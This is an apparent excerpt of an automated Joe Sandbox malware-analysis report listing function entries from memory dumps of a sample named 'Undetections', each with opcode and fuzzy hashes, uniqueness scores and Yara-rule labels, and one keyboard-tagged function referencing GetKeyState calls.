                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 18dae04b916224993a7227dd384e1f7b061805bcdb890d1df2fa8ab6879aa8ba
                                                                                                                                                                                                            • Instruction ID: ff0894ce5a3d003725c257f662a390a183d809701305facccb474b9d53c72944
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 18dae04b916224993a7227dd384e1f7b061805bcdb890d1df2fa8ab6879aa8ba
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 83E08674A04109EFCB04EFA4E50185D7BF9EF4430072081A9E8059B315DB326F009B54
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 05FCF648 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 2af754696d91771116bd2ca4410d4c244e54361e3d4b13a485d863b4e7befa07
                                                                                                                                                                                                            • Instruction ID: 10925d3b9f863dc4ebf48724b47c5d214fa7dee7188c64218597f5e7aeb718d0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2af754696d91771116bd2ca4410d4c244e54361e3d4b13a485d863b4e7befa07
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5D02223B1041E1BC20031ACFC033AD3E8EE788220F0E007AE20DC3341CD0C8842019A
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 05FC8260 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 589ff52c35a6484b112be1cd6b8f0ae7b6ea01e9343d9ad71f69d899920bcefc
                                                                                                                                                                                                            • Instruction ID: ee6816629d6d3259e7adb8ba010e75874d82b5213277fe96acb8f4de5230a6f8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 589ff52c35a6484b112be1cd6b8f0ae7b6ea01e9343d9ad71f69d899920bcefc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 55D0C7363104185F8704965EE804C5AB7EDDFCDA21311407BF209C7331DE61DC0287D4
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 16DE0CC0 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: c01c42f69c0f66fecf0797e25c5eba3b300654417a9f667fefa694d5bda79150
                                                                                                                                                                                                            • Instruction ID: 6e48d05f6ec9143a726343092258b3ce36f82877a311c39fd991bbbff75e2932
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c01c42f69c0f66fecf0797e25c5eba3b300654417a9f667fefa694d5bda79150
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29E0EC78A05208EBCB04DFA4E94196CBBB5EB45315F1091A9D80427344CB326E56DB95
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 05FC15A0 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 1b6a09b6959a3c85a3abc4e5fd1cf11d4e12ec8362949d5b32d71a30dfb60250
                                                                                                                                                                                                            • Instruction ID: 7b518826c6bbef32b40bd40a9ead71797b4546d3b6c55c88f7dd542b8f7b0300
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b6a09b6959a3c85a3abc4e5fd1cf11d4e12ec8362949d5b32d71a30dfb60250
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58D0A970C1A208DBCB18EFA8E509A7ABB7CEB03206F0021A9A50963210DF706E20D795
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 05FCB098 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 0eb7dc4ad22091b04ed2a47e04dc0679f9bc6ab22f2c54d904226ec16807b41b
                                                                                                                                                                                                            • Instruction ID: d22629ae72ee72b4b20a541f4b9ac44ee7525616f65c8973ef550fb9954ceac2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0eb7dc4ad22091b04ed2a47e04dc0679f9bc6ab22f2c54d904226ec16807b41b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 64D02230E4220EABC304EFE8DA29A7EBB3CEB03289F0025FC940423200CF785E00C285
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 05FC2C37 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 7322ddd8c839eb1ec4067c8535092e0d172502ed1e40879ae8636ab1804a42e1
                                                                                                                                                                                                            • Instruction ID: 681a8bbd62682108c812b8a1f8119267fa94cbb86426ab189a250c6801dfc2dc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7322ddd8c839eb1ec4067c8535092e0d172502ed1e40879ae8636ab1804a42e1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8D0A76110930446E614AAD89A053B03B47DB41358F182660AA09166E0DB64A452A355
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 16DEF3BF Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: f97b52c713c47b4b39d7a826e5d9ba9bb23f9730735f4cb20a3eb16542c26572
                                                                                                                                                                                                            • Instruction ID: 5123b92da1957a72f4a4539eb0bd476c01db0df8e578783aaa46895764e652a7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f97b52c713c47b4b39d7a826e5d9ba9bb23f9730735f4cb20a3eb16542c26572
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 94E0C2B524A3808FCB070B34541002C7F229FDB225B0880FFD4804A157DA3B4969E3A2
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 05FCC620 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 64c5874eaa5ad0bea4a0b3298e3968c6d6e6ba86a4e17871c27dedf469a2132f
                                                                                                                                                                                                            • Instruction ID: f6531f304c048cd62a763834bece24bfe66959d78544ba1c969b498589fcb070
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64c5874eaa5ad0bea4a0b3298e3968c6d6e6ba86a4e17871c27dedf469a2132f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F7E0E27594010ACFC700DF68D699AADBFB0AB0C304F208469E41AE7260CB389804EF50
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 05FCF658 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 0426f8877b08082948c678432d0dfa2dab46772624119436acff8ab158264d56
                                                                                                                                                                                                            • Instruction ID: d681e8658b9e25a5cd3aedab7f8c6f4e55ba90d981a88bd1e7e84c99d4656e68
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0426f8877b08082948c678432d0dfa2dab46772624119436acff8ab158264d56
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 00C02B3131012D0B430431AC780457D3FCDE788220708007EF70DC3340DE580C0002DA
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 05FCC07F Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: fe79f7bf7949f3137a0a0fd81bf185eb4486ebe06e0c332dfe8c848f3206fcae
                                                                                                                                                                                                            • Instruction ID: a7a594fa0358274b5be68916ee45b0033ce034d3476f6177f0dac6a11774085f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe79f7bf7949f3137a0a0fd81bf185eb4486ebe06e0c332dfe8c848f3206fcae
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 91D0C73955F149EADF01E734F6C4F443F53F740245F144550D04157659D7684C96CF40
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 05FC2C48 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: d2c005f9a833cdb513de87c4830b6a669c5e7852e039eae74541eed57f053d19
                                                                                                                                                                                                            • Instruction ID: 4dacfd25c75c998ccd892e7837eb5ef270cbfea09778007e0db66fc8674c1cd6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d2c005f9a833cdb513de87c4830b6a669c5e7852e039eae74541eed57f053d19
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7C08C3024530947F528BADCA505771364ADB80369F0816B4261C1A5F08AB8A860A25A
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 05FC9873 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 68746b82b8ca07f27451abe99041e3a1517d5b598d20ead5a9efe12ad7bd5536
                                                                                                                                                                                                            • Instruction ID: e0dbdca72817b7d13c0ff9ce2a82df89722206ce5fe07c19aabaf70a91a25556
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68746b82b8ca07f27451abe99041e3a1517d5b598d20ead5a9efe12ad7bd5536
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9BD01236240208BFEB40AAD4DC41D567779AB68654F509144BA084E311C172E852D750
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 16DE7028 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 85d6cdc9710c923d1c87d453f84291dfc4fe275fb77d1c269c553bbe7f6d97cf
                                                                                                                                                                                                            • Instruction ID: fc324b3dafe574b1f47bd4e46d11e1d6de7858a29342dc458ad3b0874e9532af
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 85d6cdc9710c923d1c87d453f84291dfc4fe275fb77d1c269c553bbe7f6d97cf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 87C08C703907489BE2A5AE99A448731736FAB8233AF004220726D075D1CBF89854E35F
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 05FC9878 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 172aee850317585490547c75b962eb63d67c45cc2690bd7f26f25098b2581a25
                                                                                                                                                                                                            • Instruction ID: 7c90b2cf7cdd279d705cd0b1ea78cb3d092cb8ecf8b3c8a04ab6185a5eeb4918
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 172aee850317585490547c75b962eb63d67c45cc2690bd7f26f25098b2581a25
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95C08C36340208BFDB80AFD4DC00D56BB7DAB58750F50D044FA080E211C272E862DBA0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 05FC26A8 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 248c6ec5b32a65030091eec94d17366467a610b8468166b997ce28164f053268
                                                                                                                                                                                                            • Instruction ID: 51fca134795cc832989be29f3b00b556455ad488535405cb24d02a3ba53e510b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 248c6ec5b32a65030091eec94d17366467a610b8468166b997ce28164f053268
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 47C02B2C3C914557C140E31C06C4726EFD0EB90304F40CCBDB5894530ACC14C802A732
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 16DE8310 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 732abc6e3c0cf1b9467727b29215d906b2c760cad2ff5c579bf566d2371e0fc6
                                                                                                                                                                                                            • Instruction ID: 0561cfa7bb454dd45f9a7fe1fd1b61a16df5deee3dcbc8b6b8fabeed2c6bb862
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 732abc6e3c0cf1b9467727b29215d906b2c760cad2ff5c579bf566d2371e0fc6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0C0483A04025DBBCF029F81EC01C9A3F6AEB08360F048415FA18080A19773A974FBA1
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 16DEFCBE Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 31e117911d39d0954a1c5e2818fd69ef63fa9f14701b8b512178173ce7160043
                                                                                                                                                                                                            • Instruction ID: 4c08de5d66af0bb91fed49003709658c8d02c3315a92948359e5ef4613950c46
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31e117911d39d0954a1c5e2818fd69ef63fa9f14701b8b512178173ce7160043
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7B0923BA0400889EB009AC8B4413DDFB30E784239F504063C210510418331026C9AD1
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 16DEFCB2 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 31e117911d39d0954a1c5e2818fd69ef63fa9f14701b8b512178173ce7160043
                                                                                                                                                                                                            • Instruction ID: 4c08de5d66af0bb91fed49003709658c8d02c3315a92948359e5ef4613950c46
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31e117911d39d0954a1c5e2818fd69ef63fa9f14701b8b512178173ce7160043
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7B0923BA0400889EB009AC8B4413DDFB30E784239F504063C210510418331026C9AD1
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                            Function 0F0FE2D8 Relevance: 7.6, APIs: 5, Instructions: 114keyboardCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetKeyState.USER32(00000001), ref: 0F0FE335
                                                                                                                                                                                                            • GetKeyState.USER32(00000002), ref: 0F0FE37A
                                                                                                                                                                                                            • GetKeyState.USER32(00000004), ref: 0F0FE3BF
                                                                                                                                                                                                            • GetKeyState.USER32(00000005), ref: 0F0FE404
                                                                                                                                                                                                            • GetKeyState.USER32(00000006), ref: 0F0FE449
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4308818025.000000000F0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0F0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_f0f0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: State
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1649606143-0
                                                                                                                                                                                                            • Opcode ID: 811eb73ad4559f52eceb6f82fbd5b185c2bab3aac449a81d77854ee231b5d561
                                                                                                                                                                                                            • Instruction ID: 37304eb648523e7dbc081462f2384e8927be86a9400c016de831c48aaa09bdb3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 811eb73ad4559f52eceb6f82fbd5b185c2bab3aac449a81d77854ee231b5d561
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E4184709057468FDB21DF59C94C3AFBFF4EB04308F248459D289A76A1C778A589CB92
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 16DE711B Relevance: 1.7, Strings: 1, Instructions: 404COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: poq
                                                                                                                                                                                                            • API String ID: 0-1570044193
                                                                                                                                                                                                            • Opcode ID: 80a5c9dd598399d7aa49cbb6198bf9f2ef6b7c974abf84a8d5c670787ad0096f
                                                                                                                                                                                                            • Instruction ID: 1509ed69a1eabac4b27035cbeb1e8f9b3b654341fe8944e8b8027c9766a356ca
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 80a5c9dd598399d7aa49cbb6198bf9f2ef6b7c974abf84a8d5c670787ad0096f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5102F275A00218DFDB55CFA9C980E99BBB2FF49304F1580A9E508AB332D731E995DF40
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 04EABC90 Relevance: 1.6, Strings: 1, Instructions: 388COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4104612227.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4ea0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: poq
                                                                                                                                                                                                            • API String ID: 0-1570044193
                                                                                                                                                                                                            • Opcode ID: c43fc2ca2f64a35d307c7a7bc1d10a082f1e078edad63b51fa23c5b564cd5d85
                                                                                                                                                                                                            • Instruction ID: 14f701cb00f50b6012cd271a6ff7a2bd0a31eb9c043d9b1bab14ab0b85987af0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c43fc2ca2f64a35d307c7a7bc1d10a082f1e078edad63b51fa23c5b564cd5d85
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B902C375A00218DFDB15CFA9C984E9DBBB2FF49304F1590A9E609AB236D731E991DF00
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 16E2C5A1 Relevance: .4, Instructions: 351COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4314104630.0000000016E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 16E20000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16e20000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: d9a5c2706d1c7e4462b62c3f8926846d4e36210359435fe65774722e0d65ede7
                                                                                                                                                                                                            • Instruction ID: a52c805bf8a57bb38cd047f181aa150d57d056496d5712139e8b4a94f49c0c3a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d9a5c2706d1c7e4462b62c3f8926846d4e36210359435fe65774722e0d65ede7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0026175D012698FDB60CFA9C880BDDB7F1BF59310F1086AAE859B7250E770AA94CF50
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

